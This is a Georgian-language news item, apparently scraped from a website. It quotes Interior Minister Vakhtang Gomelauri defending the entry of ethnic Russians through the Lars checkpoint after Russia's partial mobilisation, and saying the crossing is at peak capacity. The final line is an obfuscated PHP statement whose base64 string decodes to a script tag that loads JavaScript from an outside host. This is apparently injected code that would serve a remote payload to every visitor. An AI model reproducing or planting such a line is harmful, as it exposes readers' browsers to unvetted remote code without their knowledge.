celsiusi
ავერსი საქკაბელი
ეთნიკურად რუსები წლებია შემოდიან საქართველოში და დღეს უნდა გახდეს პრობლემატური? - ამ კითხვით მიმართა შს მინისტრმა, ვახტანგ გომელაურმა ჟურნალისტებს, რომლებიც ლარსის საბაჟო გამშვებ პუნქტზე შექმნილ ვითარებაზე სვამდნენ კითხვებს.
 
„ეს ადამიანები, ეთნიკურად რუსები, წლებია მოდიან, წლებია დადიან საქართველოში. დღეს უნდა გახდეს პრობლემური? უარესი მასშტაბი იყო ადრე და ბატონი სააკაშვილი ხვდებოდა, ღვინოებს ურიგებდა მანქანებში თითო ბოთლს, შემობრძანდით, თქვენ რა შუაში ხართო. ვინც კითხვებს გაბარებთ, იმას მაშინ არ ახსოვდა ეს? მოქალაქეები შემოდიოდნენ ყოველთვის და ახლა დავკეტოთ საზღვარი?“, - მიმართა ჟურნალისტებს ვახტანგ გომელაურმა.
 
რაც შეეხება კითხვას, რა არის ზღვარი, რა ოდენობის მოქალაქეების მიღებაც შეუძლია ქვეყანას, შს მინისტრმა თქვა, რომ უკვე პიკზე ვართ.
 
„ხედავთ, რომ უკვე რიგებია, უკვე გვიჭირს გატარება, თუმცა დანაყოფები გვყავს მობილიზებული, რომ მაქსიმალურად გავფილტროთ და ვინმე არ შემოგვეპაროს. გვეხმარება უსაფრთხოების სამსახური. პიკზე ვართ, არ მგონია მეტად გაიზარდოს, ფიზიკურად ვერ გავატარებთ“, - განაცხადა ვახტანგ გომელაურმა.
 
შეგახსენებთ: ვლადიმერ პუტინის მიერ ნაწილობრივი მობილიზაციის გამოცხადების შემდეგ, რუსეთის მოქალაქეების დიდი ნაკადი საქართველოსკენ დაიძრა. ლარსის საბაჟო გამშვებ პუნქტზე მასშტაბური რიგებია.
435
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");